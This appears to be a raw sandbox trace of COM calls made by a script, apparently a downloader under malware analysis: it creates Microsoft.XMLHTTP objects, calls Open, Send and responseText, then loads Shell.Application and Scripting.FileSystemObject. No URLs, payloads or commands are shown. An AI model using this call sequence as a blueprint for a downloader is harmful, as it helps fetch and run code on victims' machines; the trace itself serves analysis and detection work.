	[0276.311] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0276.311] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0276.311] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7238) returned 0x0
	[0276.311] ??2@YAPEAX_K@Z () returned 0x62f310
	[0276.311] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7238, pUnkSite=0x62f310) 
	[0276.311] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0276.311] XMLHTTPRequest:IUnknown:Release (This=0x49c7238) returned 0x0
	[0276.311] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0276.311] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0276.311] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0276.311] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0276.311] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0276.312] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0276.312] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0276.312] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0278.045] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0278.045] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0278.045] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0278.045] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0278.045] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0278.045] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0278.046] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0278.046] SysStringLen (param_1=0x0) returned 0x0
	[0278.046] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0278.046] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0278.046] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x64ef8b0) returned 0x0
	[0278.046] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0278.046] Shell:IUnknown:QueryInterface (in: This=0x64ef8b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x64ef8f0) returned 0x0
	[0278.046] ??2@YAPEAX_K@Z () returned 0x62f350
	[0278.046] Shell:IObjectWithSite:SetSite (This=0x64ef8f0, pUnkSite=0x62f350) returned 0x0
	[0278.046] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0278.046] Shell:IUnknown:Release (This=0x64ef8f0) returned 0x1
	[0278.046] Shell:IUnknown:QueryInterface (in: This=0x64ef8b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x64ef8b0) returned 0x0
	[0278.047] Shell:IUnknown:AddRef (This=0x64ef8b0) returned 0x3
	[0278.047] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0278.047] SysStringLen (param_1=0x0) returned 0x0
	[0278.047] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0278.050] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0278.050] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0278.050] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0278.050] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0278.050] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0278.051] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0278.952] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0278.952] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0278.952] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0278.954] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0278.954] SysStringLen (param_1=0x0) returned 0x0
	[0278.954] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0278.954] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0278.954] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0278.954] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0278.954] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0278.954] ??2@YAPEAX_K@Z () returned 0x62f310
	[0278.954] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0278.954] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0278.954] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0278.954] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0278.955] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0278.955] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0278.955] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0278.958] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0278.958] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0278.958] SysStringLen (param_1=0x0) returned 0x0
	[0278.958] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0278.958] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0278.958] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0278.958] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0278.958] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0278.958] ??2@YAPEAX_K@Z () returned 0x62f330
	[0278.958] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f330) 
	[0278.958] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0278.958] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0278.958] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0278.959] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0278.959] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0278.959] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0278.959] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0278.959] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0278.959] SysStringLen (param_1=0x0) returned 0x0
	[0278.959] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0278.959] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0278.959] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0278.959] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0278.959] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0278.959] ??2@YAPEAX_K@Z () returned 0x62f310
	[0278.959] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0278.959] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0278.960] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0278.960] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0278.960] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0278.960] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0278.960] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0278.960] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0278.960] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0278.960] SysStringLen (param_1=0x0) returned 0x0
	[0278.960] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0278.960] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
